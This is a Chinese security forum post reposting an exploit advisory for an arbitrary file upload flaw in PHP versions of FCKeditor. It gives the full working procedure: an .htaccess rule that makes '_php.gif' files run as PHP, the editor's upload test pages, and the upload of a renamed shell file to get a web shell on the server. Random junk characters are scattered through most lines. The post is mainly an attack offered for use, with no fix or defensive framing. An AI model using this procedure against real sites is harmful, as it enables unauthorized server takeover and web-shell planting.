找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2346|回复: 0
打印 上一主题 下一主题

FCKeditor所有php版本Upload上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-10-27 17:25:21 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
FCKeditor所有php版本Upload上传漏洞" z+ m9 Q3 [; ]* D8 y
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:078 M8 s( V* m) H8 d' q4 M% U
减小字体 增大字体
: f5 y& f+ m) Q. Z[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
3 A$ }  A  f  U[+] Date: 20119 X- V1 h! k$ ^2 l+ n! F) d6 F
[+] Author : sinesafe.cn. T4 S' g5 P% B0 ?* g) T
[+] Website : WwW.sinesafe.cn+ [% c( O; n" V5 A- ^8 V
———————————————————
* ^" A" D1 n$ G6 D; \0 {0 M3 D1.create a htaccess file:
  _# i7 v2 E$ n9 c/ {code:5 _- @% Q# {, @8 r3 @
<FilesMatch “_php.gif”># B  a9 D3 [  g7 N$ b2 e& @8 z
SetHandler application/x-httpd-php
" ~3 S% u# w+ I</FilesMatch>; V" |2 K2 W* Y6 G3 q$ `

! ]* H, \' C. c, j/ Z- l1 N& Y2.Now upload this htaccess with FCKeditor.. x, L% y' j4 P, z6 U0 m7 v& M" p
3 G0 H3 O$ i9 F  \( r/ d+ L0 F. D
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
& Y4 H5 \0 T1 i  A* B+ m* p0 z0 E7 P4 Q7 j6 s. @  E) T
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html  z: ^* I! m' w  D2 a' }
1 ^" s, ^7 ^2 h7 N. c
———————————————————————————————-
" D' Z' t5 k7 l+ r. Q; p3.Now upload shell.php.gif with FCKeditor.
. O5 k. V# J- y( X4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.8 R6 c2 T8 c4 H
5.http://www.sinesafe.cn/anything/shell_php.gif, D# ?; [- C9 f) i2 |
6.Now shell is available from server.

3 Z! W/ n1 q' s+ J  l$ U2 I3 d+ P
8 `$ G& R# G* a2 u! ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表